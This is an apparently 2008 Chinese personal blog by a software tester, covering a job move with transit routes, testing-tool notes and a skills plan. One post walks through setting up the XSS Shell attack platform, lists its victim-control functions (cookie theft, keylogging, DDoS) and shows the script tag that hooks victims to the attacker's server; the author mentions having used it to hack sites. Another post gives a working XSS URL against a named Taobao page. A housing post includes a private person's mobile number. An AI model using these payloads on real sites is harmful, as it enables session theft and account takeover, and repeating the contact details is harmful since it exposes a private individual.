专注,专业,专心。人因为专业而优秀。

我的最新日志

  • 准备转移

    2008-8-27

    终于等到了公司的offer,说是给我发了。现在也没有收到。工资比要求的少了1k。自己一年的工作经历是一点忙也没有帮上,还不如自己自己学习一个月更实在。换行工作就是这个缺点。
    无所谓了。既然自己都早决定破釜沉舟了,就认真去做吧。

    没有时间去学习东西了。最近要收拾行李搬家,还有一项工作没有做完。给一个朋友写书。

    基本的路线图花时间收集了一下。标注一下,省得自己忘记了。



    1、做火车去杭州

    t31  北京到杭州  空调特快  15:56发,6:26到。 硬座 194

    2、做公交去公司

    线路1:    从城站火车站出发,乘坐K900路(城站火车站-三墩),抵达古翠路天目山路口. 约10.0公里
    线路2:    从城站火车站出发,乘坐K95路上行(城站火车站-府新花园南),抵达天苑花园. 约10.33公里
    线路3:    从城站火车站出发,乘坐K156路(城站火车站-翠苑四区),抵达天苑花园. 约11.23公里

    3、坐公交去租房,地点靠近浙大,方便吃饭,读书,听课。

    线路1:    从城站火车站出发,乘坐K95路上行(城站火车站-府新花园南),在丰潭路口换乘817/K817路(武林门马塍路口-光明路留祥路口),抵达浙大紫金港校区. 约16.57公里
    线路2:    从城站火车站出发,乘坐11/K11路(城站火车站-翠苑新村),在庆丰村换乘817/K817路(武林门马塍路口-光明路留祥路口),抵达浙大紫金港校区. 约16.95公里
    线路3:    从城站火车站出发,乘坐K900路(城站火车站-三墩),在机动车辆管理所换乘K74路上行(三里亭小区-浙大紫金港校区),抵达浙大紫金港校区. 约16.35公里

    4、租房的地点
    颐高西溪数码港附近,阿里巴巴边,物美旁文三路与文二路间华星路上嘉绿青租房,去问。
    古墩路,浙大紫荆港,华东陶瓷品市场附近望月公寓租房   800 
    联系人:方晨曦 先生  手机:15868891603
    还有万唐路很多。





    查看(58) 评论(5)

  • 放弃qtp

    2008-8-25

    定位了新公司。qtp可能是用不到了。暂时不学习了。
    为了适应新公司,我需要学习linux,selenium,和jmeter。
    尽量多做一些准备,qtp的那本书,就送给朋友吧。
    一个人的技能,只有为公司所用,才具有真正的价值。
    有新机会了,就一定要努力。不枉费自己的决心。

    查看(49) 评论(0)

  • 最佳blog投了两票

    2008-8-23

    投给了tengmy和gaarchite。没有发现liangjz的。不然也投他的了。
    其他的blog不是太熟悉。有时间再去看看。其他的lbog很少去。

    应该多读读别人的文章,学习一下别人的经验。blog上的东西是最宝贵的工作第一手资料。

    查看(14) 评论(0)

  • lr9.0不支持vista

    2008-8-22

    今天的一个教训。vista的又一个让我心烦的毛病。

    录制的程序无法执行,提示0xc0000005错误。
    创建场景的后,执行出错,提示某个文件的n行有问题。
    以为是权限的问题,就关掉了user account control,结果还是不行。

    去网上搜索了一下,结果发现lr9.0不支持vista。
    我感觉我离格式化vista不远了。

    发现lr9.0确实是更新了不少东西。提出了很多的新概念。

    查看(9) 评论(0)

  • 试手LoadRunner9.0

    2008-8-22

    从论坛上搜索到了loadrunner9的下载地址。然后下载下来了。我的系统是vista。
    现在对vista一点好感也没有。

    n多的软件不兼容,硬件不兼容,就包括我的一个读卡器。害的我不得不装一个xp。
    很多程序也应为vista的特殊限制而运行不起来,自己配置,花费了n多时间。
    因为这个系统已经装好了很多的工具,也懒的换了。

    从今天开始正式研究loadrunner,以前项目用过一次,学习过一段时间,掌握了点皮毛,现在基本上已经忘的差不多了。因为决定要重点关注性能测试,所以,就开始研究。

    loadrunner9.0在vista上因为种种vista的限制,会发生一些小毛病,比如无法录制,无法运行。
    索性就把vista的user account control给关掉了。

    新版本的界面发生了很多的变化,重要的功能才菜单还是没有变。录制格式依然是c风格的,还算满意。
    新版本扩展了很多的东西,增加了不少的支持。看来,lr又要领风骚一阵子了。

    学习计划

    1、首先看一篇用户手册
    2、利用自带例子练手。
    3、重温以前买的三本性能测试书籍。


    loadrunner除了可以进行性能测试,还可以进行很多很多扩展,比如xss检测,sql注入检测等。
    只是人们都还没有意识到这些功能。
    等使用熟练了,一定要进行一些扩展,让这个工具成为自己的又一把倚天剑。


    因为学习经历有限,性能测试只学习loadrunner。第三方工具就不研究了。阿里巴巴的人好像是还研究jmeter。对这个不熟悉。在lr没有彻底熟悉之前,不要花费时间去关注它。
    专注于一种即可,不要让自己太浮躁。

    像liangjz,qaarchite那样的牛人,是需要n年才可以做到的。

    查看(28) 评论(0)

  • xss测试步骤优化

    2008-8-22

    xss测试的一般步骤,总结了一下,尽量让xss测试的步骤简单高效一些。

    测试xss一直很麻烦,一直想找个方法优化一下,经过几天的探索。终于找到了一个省时省力的方法。
    首先介绍一下需要的工具。
    xssshell是一个xss攻击平台。它首先需要搭建一个asp web服务器,将自身搭建起来,监听请求,
    然后在xss地方,嵌入一个外部脚本文件,这个脚本文件会定期的访问xssshell服务器上的文件内容,然后执行。
    这样就可以通过xssshell本身的服务,来动态的修改xss语句。(以前曾用这个黑过网站,刷过流量)
    网上也有另一个xss攻击平台,是beEF,linux上的,因为搭建比较复杂,就不提了。如果需要更好的功能,可以尝试一下。
    我的虚拟机是vpc,对linux的支持不好,没有办法。暂时不研究那个了。


    第一步,搭建xssshell,首先下载xssshell,
    官方地址  http://www.portcullis-security.com/16.php

    修改默认的密码和数据库文件的路径,然后自己搭建一个简易的web服务器,可以使用net box搭建。
    搭建好后,就可以访问管理员页面,查看其中的功能。

    具体的功能包括

    getCookie()
    Get victims active cookie
    getSelfHtml()
    Get victim's current page HTML Code
    alert(<message>)
    Send message to victim
    eval(<javascrīpt code>)
    Execute virtually anything in JS
    prompt(<question>)
    Play Truth or Dare
    getKeyloggerData()
    Get keylogger data
    getMouseLog()
    Get mouse log (every click in screen)
    getClipboard()
    Get clipboard data (only IE)
    getInternalIP()
    Get internal IP address (only Mozilla* + JVM)
    checkVisitedLinks(<url list>)
    Check victim's history (seperated by new line)
    getPage(<Relative URL Path>)
    Make a request with victim credentials
    DDoS(<url>)
    Distributed Denial of Service attack (use {RANDOM} in URL to avoid caching)
    Crash()
    Consume victim's CPU and force to crash/close.
    GetLocation()
    Get current URL of victim.

    同时xssshell提供了一个实例程序,请参考具体的说明。


    第二步,在目标xss页面中,想办法嵌入一个外部的脚本链接,也就是加入
    <scrīpt src="你的xssshell.asp的网络地址"></scrīpt>,这样就可以了。

    第三步,登录xssshell的后台管理页面,就可以发现,有个计算机上线了,而且还提示基本的国家标志。浏览器类型。
    然后,你就可以对主机进行各种功能的请求。比如发送消息,获得cookie,执行脚本,访问网页等等操作。

    第四步,此步是高级应用。使用XSSTunnel,详细功能可以参考官方的说明,可以通过xss进行一些服务请求。因为这些请求时通过xss进行的。所以,获得的权限和身份也是以对方的身份进行的。如果是网站的管理员点击了你的xss页面,那么,你就可以在本地通过xssstunnel进行一些管理员的操作。


    xss测试的目的就是让开发人员相信,xss能够引起的足够危害。所以,只要达到自己的目标就可以了。
    比如演示通过xss获得管理员权限,然后执行管理员操作。利用xss手机受害者的敏感信息等。到此为止就已经达到了测试的要求了,再深入就成hack了。
    第一步是个一劳永逸的工作,测试的时候,主要就是在xss处嵌入脚本,然后等待受害者上线就可以了。
    这样就精简了很多的流程,和一些重复的体力活。

    [ 本帖最后由 sihanjishu 于 2008-8-22 13:37 编辑 ]

    xssshell.jpg

    查看(63) 评论(0)

  • 个人技能发展方向

    2008-8-21

    记得以前有一个同事曾经说过,人不能精通所有的技能。
    她说的所有是指自动化测试,性能测试,和手工测试。在她看来,这些东西是没有时间和机会去深入研究的。
    但是自己一直没有被这句话打倒,一直在努力学习。后来发现,要想同时掌握多项技能。真的是很难。
    即使自己肯努力,也没有时间和项目让自己去锻炼这些,很多的技能一直停留在表面的技术上。
    所以,自己精简了自己的学习方向,争取让自己的技能能够先精通,再广泛。

    重新去解释,是因为看到别人收藏了这个文章,所以,为了怕别人误解,我从新解释一下。
    需要重点努力的方向。

    开发能力

    1、c++
    c++无疑是最强大的语言,提供的指针概念让c++具有很大的作用,c++风格也影响了很多的后来语言,包括java和c#,了解c编程,同时也有机会深入系统的底层,对计算机的很多理解会有更深层次的理解。
    早期,一直用来写一些木马,病毒,和系统工具。以高效著称。
    c#和java封装了太多的东西,让人没有机会去接触系统底层的东西,也同时 限制了人的知识面。

    2、c#
    高效的开发语言,优秀的语法风格和整体架构。接近完美的一种语言。用来开发常用的客户端工具,比较快速。
    c#也是微软的重点推广项目,学习他也可以跟上微软的节奏。对于以后从事微软系的工作是非常有帮助的。

    3、python

    python新兴的解释型的语言,具备了很多优秀的结构和语言,因为是解释型的。所以,开发起来方便修改,其他人写的程序都是公开代码的,所以,方便自己的学习。同时python具有非常广泛的类库或者模块,扩展性极强。很多的东西可以复用。
    python具有跨平台的作用,对于快速的开发其他平台的工具,或者进行操作是非常有帮助的。
    我是看重了他的简约和强大的类库。
    写一些小型的工具,爬虫,发送请求,批量操作,数据嗅探,等应用,非常简单。

    4、汇编

    之所以,保留这个,是因为要理解系统底层,这个是少不了的。
    汇编在操纵底层方面是最强的,具有其他语言没有的一些特性。
    在软件破解,反向分析,病毒免杀方面有用,自己以前喜欢黑客,所以,这个技能也不舍得丢。
    项目中用到的很少。

    web技能
    1、javascrīpt & vbscrīpt & ajax
    javascrīpt将是以后主流的web客户端开发语言,很多的逻辑和操纵都依赖javascrīpt,测试必备技能。
    vbscrīpt和javascrīpt一样的功能,因为qtp是扩展的vbscrīpt语言,所以,这个东西也是需要熟悉的。
    ajax很简单,以后的用处也很大,所以,这个也非常重要。对于测试程序,操纵web页面是非常有帮助的。

    2、asp.net & soap
    web服务端的开发技能总要具有一项吧,asp已经落伍了,jsp,php,asp.net将是非常流行的。
    asp已经掌握了,没有必要学习了。asp的重要性也大大降低,所以,就放弃了。
    因为自己以前从事微软的方向,所以,asp.net是应该掌握的。况且它也可以快速开发一些应用,也是非常好的一门技能。对于熟悉web服务端技术,是有一定帮助的。
    soap是以后web的一个方向,发展很快,以后的项目,可能会遇到。

    3、css &html & xml & xpath
    html就不说了,css也是需要掌握的,况且css除了定义样式外,还具有js执行功能。所以,是需要掌握的。
    xpath也是一个方向,现在不会,感觉有必要掌握。

    4、jsp
    脱离了微软系,java将是老大,jsp是服务器端非常重要的开发工具,测试项目也肯定会有的。以后的重要性可能会上升。

    os平台

    1、windows
    2、red hat linux
    测试肯定是需要跨平台的,尤其是测试weblogic等中间件服务器。或者其他的linux的服务器架构。
    很多的应用也是架构在linux,unix上的。

    3、ubuntu
    自己玩,发展最快的linux桌面产品。对于熟悉linux,是个不错的入门。

    web应用服务器
    1、iis
    2、apache&tomcat
    3、weblogic&websphere

    数据库服务器
    1、ms sql server & t-sql
    2、oracle

    现在的应用都是离不开数据库的,sql是必须熟悉的。

    测试工具
    1、QTP
    2、Loadrunner
    3、微软的maui,mita和其他自动化测试技术。
    4、TD & QC
    5、selenium

    常用的工具,有商业的,也有开源的,只是为全面掌握测试的具体技术。


    network技术

    1、数据嗅探(tcp,udp,http,soap,snmp)
    2、网络分析
    2、数据包分析、数据包修改

    测试和hack都是有帮助的技能。


    办公处理

    1、word & excel & access 高级应用,会定义格式,定义函数

    office办公,这些是少不了的。日常使用。


    沟通和管理
    1、沟通能力
    2、组织能力
    3、管理能力

    决定个人发展生涯的三项软技能,描述很短,但是内容很多,没有实用的教材,靠自己的领悟能力。
    要想人生突破,这个是必须跨越的。

    外语能力

    1、英语,要达到与外国人顺畅沟通的程度。专注此一样。


    hack能力

    1、注入
    2、跨站

    基本的安全测试是需要的。平时hack也是非常有用的技能。hack将作为自己的一个业务能力。对于以后打击网络犯罪,帮助朋友解决安全问题是非常有用的。

    查看(121) 评论(1)

  • ajax使用教训

    2008-8-21

    1、firefox下,
    xmlhttp.open("GET", action, false);
    xmlhttp.send();
    return xmlhttp.responseText;

    是运行错误的,正确的方法是在send()函数中传入一个null值。
    ie下是不需要的。真是变态。


    2、open函数是可以传入绝对路径的。但是这个路径必须是和当前脚本文件是同一个域的。
    否则,会提示一个object error 错误。害我调试了一个上午。后来换了一个页面才正确,看来应该及时转换思路。

    3、document.cookie无法修改,不知道怎么回事。使用=是修改不了真正的cookie的。
    document.cookie=“name=value"





    查看(11) 评论(0)

  • 51testing上blog系统的一个小小bug

    2008-8-21

    在文章里插入链接的时候,尝试着写入'></scrīpt><scrīpt>alert(33)</scrīpt>。

    就会发现你的页面会弹框。显示结果也爆出了js的一些内容。这只是客户端的解析问题,

    这只能欺骗自己,没有危害的。

    本地解析出了问题,穿上服务器,还是没有任何问题。代码都已经经过过滤了。

    娱乐一下。

    本来是贴出其他网站的xss的,结果就发现来这个问题。


    分析一下,js的主要代码,这是添加链接的。

    var a = document.getElementById("wordEditer_Link_ADS").value;

    var v = document.getElementById("wordEditer_Link_TEXT").value;

    if(a == "") return;

    if(v == "") v = a;

    var html = "<a href='" + a + "' target=\"" + t + "\">" + v + "</a>";


    所以,添加的连接里,必须没有'和“, html变量最终会被打断,就乱了。这一切都是本地的操作。
    传入服务器上后,都是经过html编码的,不会有什么问题。

    所以,没有危害,只是娱乐而已。

    同时也发生了一次疏忽,因为我在开着工具调试,结果上网站的时候,忘记关了,直接生成了一大堆日志。
    无言了。




    查看(21) 评论(0)

  • 淘宝的xss还真多

    2008-8-21

    淘宝的xss地方还真多。很奇怪。
    同样的参数,不同的模块过滤不一样。看来是和他们项目组当初开发的时候出现的问题。
    不是同一个人写的,所以,才有这样的差别。
    如下地址。个别参数基本上什么都没有过滤。

    http://search1.taobao.com/browse/0/n-g,pb4hq6dypb4hq6dy----------------40--commend-0-all-0.htm?at_topsearch='></scrīpt><scrīpt>alert(33)</scrīpt>



    查看(30) 评论(0)

Open Toolbar